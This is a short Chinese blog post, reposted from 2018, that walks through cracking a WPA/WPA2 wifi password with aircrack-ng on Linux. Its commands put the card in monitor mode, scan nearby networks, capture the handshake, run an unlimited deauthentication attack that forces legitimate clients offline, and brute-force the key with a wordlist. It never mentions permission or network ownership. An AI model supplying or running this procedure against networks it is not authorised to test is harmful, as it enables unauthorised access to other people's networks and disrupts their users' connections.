Linux上使用aircrack-ng破解wifi

这是一篇我写于2018年的文章,首发于CSDN,现重新粘贴在这里。
使用工具:aircrack-ng
环境:deepin linux

虚拟机读取不了笔记本的网卡信息,推荐使用物理机进行操作,或者购买wifi接收器
若无此工具要先安装

apt-get install aircrack-ng

首先开启网卡监听模式

sudo airmon-ng start wlp2s0

wlp2s0为本机网卡名,可用ifconfigiwconfig查看

此时卡网被改了名字,上图可见,或则同样ifconfigiwconfig查看

然后扫描附近wifi信号

sudo airodump-ng wlp2s0mon

:airodump-ng <你的网卡名称>
• BSSID是AP端的MAC地址
• PWR是信号强度,数字越小越好
• Data是对应的路由器的在线数据吞吐量,数字越大,数据上传量越大。
• CH是对应路由器的所在频道
• ESSID是对应路由器的名称

停止扫描后使用airodump-ng监听指定目标频道

:airodump-ng -c <AP的频道> -w <抓取握手包的存放位置> –bssid <AP的MAC地址> <你的网卡名称>

当你获取道握手包时,右上角区域会显示WPA handshake,因为后期截图的原因,这里显示已获取,若没有获取则需要发动攻击,迫使合法的客户端断线,进行重新认证,我们趁机抓包。

保持上一个终端窗口的运行状态,打开一个新的终端

:aireplay-ng -<攻击模式,我们这里使用 解除认证攻击> [攻击次数,0为无限攻击] -a <AP端的MAC地址> -c <客户端端的MAC地址> <你的网卡名称>

这里我使用的是解除认证攻击模式,给客户端无限发送测试包使其下线。当你获取到握手包时,可以使用Ctrl + C 停止发送测试包。

在你的抓取握手包的存放目录会生成4个文件,握手包文件的拓展名为 .cap

现在可关闭监听模式,不关也无影响

sudo airmon-ng stop wlp2s0mon

并且重启网卡服务

systemctl start NetworkManager.service

最后使用字典进行暴力破解,当密码破解成功时,会显示KEY FOUND!字样,中括号为wifi密码。

:aircrack-ng -w <字典路径> <握手包路径>

wpa/wpa2的密码破解完全靠运气,但是一个强大字典是肯定可以提高破解的成功几率。

Thank you very much if you can.

欢迎关注我的其它发布渠道